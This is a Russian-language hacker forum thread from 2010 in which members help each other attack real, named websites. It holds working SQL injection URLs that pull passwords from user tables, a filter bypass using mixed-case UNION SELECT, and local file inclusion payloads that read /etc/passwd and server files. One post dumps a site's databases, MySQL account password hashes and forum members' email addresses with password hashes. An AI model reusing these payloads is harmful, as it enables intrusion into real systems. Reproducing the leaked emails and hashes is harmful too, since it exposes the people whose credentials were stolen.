Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Deani

    Deani New Member

    Joined:
    9 Nov 2009
    Messages:
    49
    Likes Received:
    1
    Reputations:
    0
    подскажите, как через sql inj сделать dump базы ?
     
  2. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    помоqите поjaлуста

    а вот не получается


    и так тоje
     
    #12362 LokbatanLi, 15 Apr 2010
    Last edited: 15 Apr 2010
  3. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.venen-kur.info/index.php?id=1319&lang=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+
    
    в чем трабл?
     
  4. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    и так тоje

     
  5. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    System information:
    -----------------------------------------
    base:db242799363
    basedir:/usr/local/mysql-5.0.81-linux-i686-glibc23/
    os:pc-linux-gnu
    ver:5.0.81-log
    datadir:/db/mysql/
    tmpdir:/var/tmp
    -----------------------------------------
    Tables in information_schema.tables - 29
    -----------------------------------------
    COLLATIONS
    COLUMNS
    COLUMN_PRIVILEGES
    ROUTINES
    SCHEMA_PRIVILEGES
    TABLES
    TABLE_PRIVILEGES
    USER_PRIVILEGES
    cms_languages
    cms_pages
    cms_settings
    user_functions
    user_groups
    user_platforms
    CHARACTER_SETS
    COLLATION_CHARACTER_SET_APPLICABILITY
    KEY_COLUMN_USAGE
    PROFILING
    SCHEMATA
    STATISTICS
    TABLE_CONSTRAINTS
    TRIGGERS
    VIEWS
    cms_media
    cms_related
    cms_trees
    user_group_functions
    user_in_group
    user_users
    -----------------------------------------
    Table [ user_users ]
    -----------------------------------------
    Database for user_users: example.com
    Number of columns in example.com.user_users: 9
    Columns in example.com.user_users
      username
      platform_id
      is_superuser
      first_login
      session_key
      id
      email
      password
      session
    ----------
    
    не вижу никаких проблем
     
  6. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    ну вообще да))

    PS:

    Code:
    http://www.venen-kur.info/index.php?id=1319&lang=(select+1+from+(select+count(0),concat((select+password+from+user_users+limit+0,1),floor(rand(0)*2))+from+user_users+group+by+2)a)--+
    
     
    #12366 Pashkela, 15 Apr 2010
    Last edited: 15 Apr 2010
    1 person likes this.
  7. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    вот именно ети я тоjэ виташил а коqда зделаеш concat(username видает error
     
  8. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    davay link
     
  9. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    a qde login pass ?

    jmvN/m90uBX8OHg ??
     
  10. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    net ti zdelal concat_ws%28 username,0x3a,password%29

    a vidimo tolko :jmvN/m90uBX8OHg

    a eto sto login ili parol ?? a zacem tolko eto ?
     
  11. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    ok ponyatno..pasiba..
     
  12. Keltos

    Keltos Banned

    Joined:
    8 Jul 2009
    Messages:
    1,558
    Likes Received:
    920
    Reputations:
    520
    Помогите плиз:
    Вот php инъекция:
    Code:
    http://www.partnersinpreservation.com/boston/index.php?sec=../../../../../../../../../../../../../etc/passwd%00&locID=16 
    нашел там PHPSESSID он там j7h4hqb6d43c1f0e3bc84volf6
    вбиваю
    Code:
    http://www.partnersinpreservation.com/boston/index.php?sec=../../../../../../../../../../../../../tmp/sess_j7h4hqb6d43c1f0e3bc84volf6
    ничего нет

    в какой еще директории может быть файл сессии?
     
  13. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Лучше вот это поизучай:
    Code:
    http://www.partnersinpreservation.com/boston/index.php?sec=/proc/self/status%00
    
    http://www.partnersinpreservation.com/boston/index.php?sec=/etc/httpd/conf/httpd.conf%00
    
    http://www.partnersinpreservation.com/boston/index.php?sec=/proc/version%00
    
    https://forum.antichat.net/showpost.php?p=1088072&postcount=11
     
    #12373 Pashkela, 16 Apr 2010
    Last edited: 16 Apr 2010
  14. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    стандартная скуль

    http://www.nicemeeting.fr/modules.php?name=Annonces&op=ViewCatg&id_catg=220%27

    но union и select режется модулем NukeSentinel

    http://www.nicemeeting.fr/modules.php?name=Annonces&op=ViewCatg&id_catg=220+and+substring%28version%28%29,1,1%29=5

    в подзапросах также режется select

    как обойти?
     
  15. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    Например так

    Code:
    http://www.nicemeeting.fr/modules.php?name=Annonces&op=ViewCatg&id_catg=-220+unIoN+SeLeCt+1,2+--+
     
    2 people like this.
  16. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Кто может дать хорший и мощный скрипт што бы дамп БД на 3 гига слить, а то ошибки выдает с такими размерами!!
     
  17. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    GOGA075,
    Sypex Dumper скачай
     
  18. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    jecka3000, вот как раз он то и выдает ошибки!!!
    Что 1.0.8b и 2.0.6
    несправляються с такими обьемами!!
     
  19. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    ммм... :)
    Code:
    http://amkar.properm.ru/info.php?id=-999.9+or%281,1%29=%28select+count%280%29,concat%28%28select+concat%28database%28%29%29+from+information_schema.tables+limit+0,1%29,floor%28rand%280%29*2%29%29from%28information_schema.tables%29group+by+2%29

    Version:
    5.0.51a-24+lenny2-log
    Current User: properm@localhost
    Code:
    [SIZE=5][COLOR=Red][B]Data Bases: [/B][/COLOR][/SIZE]
    		_muzik
    		amkar
    		amkar_fan
    		amore
    		avto
    		baba
    		bikini
    		comix
    		contests
    		euroset
    		forum
    		globass
    		klass
    		kvn
    		led
    		linkation
    		map
    		miss_whatever
    		miss_zima
    		moda
    		muzik
    		muzik_old
    		mysql
    		nebo
    		nevesta
    		newseater
    		permskoe
    		properm
    		reality
    		reality_backup
    		seolib
    		sf
    		spravka
    		spravka2
    		spravka_backup_2009_10_31
    		spravka_backup_2009_11_07
    [COLOR=Red][SIZE=5][B]User: [/B]	[/SIZE][/COLOR]
                    'root'@'localhost'
    		'reality'@'localhost'
    		'realty'@'localhost'
    		'seo'@'localhost'
    		'sprvk'@'localhost'
    		'zabbix'@'localhost'
    		'spravka'@'localhost'
    		'properm'@'localhost'
    		'debian-sys-maint'@'localhost'
    		'root'@'proserv'
    		'alya'@'%'
    		'replication_user'@'%'
    		'remote_root'@'%'
    [SIZE=5][COLOR=Red][B]
    MySQL DB[/B][/COLOR]
    [/SIZE]
    [COLOR=DarkGreen][U]User [/U] 	[U]Password[/U][/COLOR]
    [B]alya [/B]	*8D43FE3D5955DD53B1156534EE7AD854CA88FF24
    [B]remote_root [/B]	
    [B]replication_user [/B]	*A1DAA5D16F63E661DFFE8FB7E5CCF0E235F0C601
    [B]debian-sys-maint [/B]	*D6E3AC52927F6BD477ACFEB9E18DCCC3094FFF97
    [B]properm [/B]	*C58CE76F735421EB5B5BC2BB332CEF2674661499
    [B]reality [/B]	*66758BD9AE5EFE6F5EFD754A0386969808EE2991
    [B]realty [/B]	*27D8E13E226CE3F3DB6116796584A6BCF2AA3305
    [B]root [/B]	*966F8B69DCE8F1383221C7E89C8AB06697332DAC
    [B]seo [/B]	*6063C78456BB048BAF36BE1104D12D547834DFEA
    [B]spravka [/B]	*050376F3855A67F5E2C6514FD3130B31006C1276
    [B]sprvk [/B]	*30763283C56FC465C0F1F869CD097A5ABDF1F4D9
    [B]zabbix [/B]	*2D90A69B6136A8DE2E6B87DC14504CE500DA21CF
    [B]root [/B]	*CAC83AB2E75198C3287CD7E81B808F9C6D54B41A
    
    
    [SIZE=5][B]DATABASE:[/B][/SIZE] [COLOR=DarkGreen][B]forum[/B][/COLOR]
    [SIZE=5][B](TABLES):[/B][/SIZE]
    fpp_admin_logs  	
    fpp_admin_sessions 	
    fpp_badwords 	
    fpp_cache_store 	
    fpp_calendar_events 	
    fpp_categories 	
    fpp_contacts 	
    fpp_css 	
    fpp_email_logs 	
    fpp_emoticons 	
    fpp_faq 	
    fpp_files 	
    fpp_files_cats 	
    fpp_files_comments 	
    fpp_files_custentered 	
    fpp_files_custfields 	
    fpp_files_downloads 	
    fpp_files_favorites 	
    fpp_files_votes 	
    fpp_forum_perms 	
    fpp_forum_tracker 	
    fpp_forums 	
    fpp_groups 	
    fpp_languages 	
    fpp_macro 	
    fpp_macro_name 	
    fpp_member_extra 	
    fpp_members 	
    fpp_messages 	
    fpp_moderator_logs 	
    fpp_moderators 	
    fpp_pfields_content 	
    fpp_pfields_data 	
    fpp_polls 	
    fpp_posts 	
    fpp_reg_antispam 	
    fpp_search_results 	
    fpp_sessions 	
    fpp_skin_templates 	
    fpp_skins 	
    fpp_spider_logs 	
    fpp_stats 	
    fpp_subscription_currency 	
    fpp_subscription_extra 	
    fpp_subscription_logs 	
    fpp_subscription_methods 	
    fpp_subscription_trans 	
    fpp_subscriptions 	
    fpp_templates 	
    fpp_titles 	
    fpp_tmpl_names 	
    fpp_topic_mmod 	
    fpp_topics 	
    fpp_tracker 	
    fpp_validating 	
    fpp_voters 	
    fpp_warn_logs 	
    ibf_admin_logs 	
    ibf_admin_sessions 	
    ibf_announcements 	
    ibf_attachments 	
    ibf_attachments_type 	
    ibf_badwords 	
    ibf_banfilters 	
    ibf_bulk_mail 	
    ibf_cache_store 	
    ibf_calendar_events 	
    ibf_conf_settings 	
    ibf_conf_settings_titles 	
    ibf_contacts 	
    ibf_custom_bbcode 	
    ibf_email_logs 	
    ibf_emoticons 	
    ibf_faq 	
    ibf_forum_perms 	
    ibf_forum_tracker 	
    ibf_forums 	
    ibf_groups 	
    ibf_languages 	
    ibf_mail_error_logs 	
    ibf_mail_queue 	
    ibf_member_extra 	
    ibf_members 	
    ibf_members_converge 	
    ibf_message_text 	
    ibf_message_topics 	
    ibf_moderator_logs 	
    ibf_moderators 	
    ibf_pfields_content 	
    ibf_pfields_data 	
    ibf_polls 	
    ibf_posts 	
    ibf_reg_antispam 	
    ibf_search_results 	
    ibf_sessions 	
    ibf_skin_macro 	
    ibf_skin_sets 	
    ibf_skin_templates 	
    ibf_skin_templates_cache 	
    ibf_spider_logs 	
    ibf_subscription_currency 	
    ibf_subscription_extra 	
    ibf_subscription_logs 	
    ibf_subscription_methods 	
    ibf_subscription_trans 	
    ibf_subscriptions 	
    ibf_task_logs 	
    ibf_task_manager 	
    ibf_titles 	
    ibf_topic_mmod 	
    ibf_topics 	
    ibf_topics_read 	
    ibf_tracker 	
    ibf_upgrade_history 	
    ibf_validating 	
    ibf_voters 	
    ibf_warn_logs
    
    [B][SIZE=5][COLOR=Red]Table:[/COLOR] [/SIZE][/B][B][COLOR=DarkGreen]fpp_members[/COLOR][/B]
    
    [SIZE=5]email 	[CENTER]password[/CENTER] 	[RIGHT]name[/SIZE][/RIGHT]
    test@localhost.com  	 	[RIGHT]chucha[/RIGHT]
    pn@reaktive.ru 	7277da89be64a89aa02a2d7423a0c05c 	Guest
    red_ma@mail.ru 	81dc9bdb52d04dc20036dbd8313ed055 	Juissy
    vsv1407@yandex.ru 	1406e7afb3eb1f83b4bd4e310cee7fc6 	magic
    ca@properm.ru 	287e9593819b2fcdf9945e7ccacd637d 	reaktive
    pn@reaktive.ru 	72fed2b8265919690c815f0316b346cc 	scbsncks
    ve@properm.ru 	b0baee9d279d34fa1dfd71aadb908c3f 	wer
    stasne@yandex.ru 	48309aa13d9d9497b097495188b2863a 	Николай
    
    
    
    
    
    
    
    
    
    
    
     
    2 people like this.
  20. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    посмотрел на phpinfo() там magic_quotes_gpc в local value ON а в master value OFF..
    и теперь ON или OFF ??
     
Thread Status:
Not open for further replies.